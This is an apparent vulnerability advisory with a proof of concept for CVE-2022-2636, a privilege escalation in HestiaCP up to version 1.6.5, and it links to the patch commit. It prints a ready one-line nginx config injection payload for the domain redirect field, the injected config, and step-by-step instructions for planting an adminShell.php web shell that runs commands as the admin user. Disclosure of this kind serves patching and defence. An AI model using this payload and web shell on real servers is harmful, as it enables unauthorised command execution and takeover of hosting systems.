CVE-2022-2636 HestiaCP Privilege Escalation Nginx Conf Priv Esc
Privilege Escalation
Hestiacp <=1.6.5 is vulnerable to privilege escalation. Improper input validation allows an attacker to privilege escalation and can make crash nginx server. There is no input validation in the v-add-web-domain-redirect#L82
, and v-redirect-custom
input on the “Edit Web Domain” page, inputs are written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect
file. This file is included in /home/user/conf/web/domain.com/nginx.conf
file.
/home/user/conf/web/domain.com/nginx.conf
...
location ~ /\.(?!well-known\/|file) {
deny all;
return 404;
}
include /home/test/conf/web/poc.com/nginx.conf_*;
}
/home/user/conf/web/domain.com/nginx.conf_redirect
file before payload (input is asd
)
if ($host != "asd") {
return 301 $scheme://asd$request_uri;
}
/home/user/conf/web/domain.com/nginx.conf_redirect
file after payload
if ($host != "redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #") {
return 301 $scheme://redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #$request_uri;
}
PoC
- Payload ( has to be one line! )
redStar$request_uri; ## " ) {} location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } if ( $host = false ) { #
- login as user
- Create a domain in dashbard
- go to Files in top bar
- go to “public_html” folder and create a php file contains like below, visit php file with browser, prepare your payload with fullpath and hostname information.
x.php <?php echo getcwd(); echo "<br>"; system("hostname");
- go to “Edit Web Domain” page in dashboard, select “Enable domain redirection” then select “Redirect visitors to a custom domain or web address”, enter payload to text box and click save button.
- go to “public_html” folder, create a php file named adminShell.php
adminShell.php <?php system("id; whoami;");
- Visit /adminShell.php with browser, commands running as “admin” user.
PoC Video
Patch Commit
https://github.com/hestiacp/hestiacp/commit/b178b9719bb2c98cf8a6db70065086f596afad81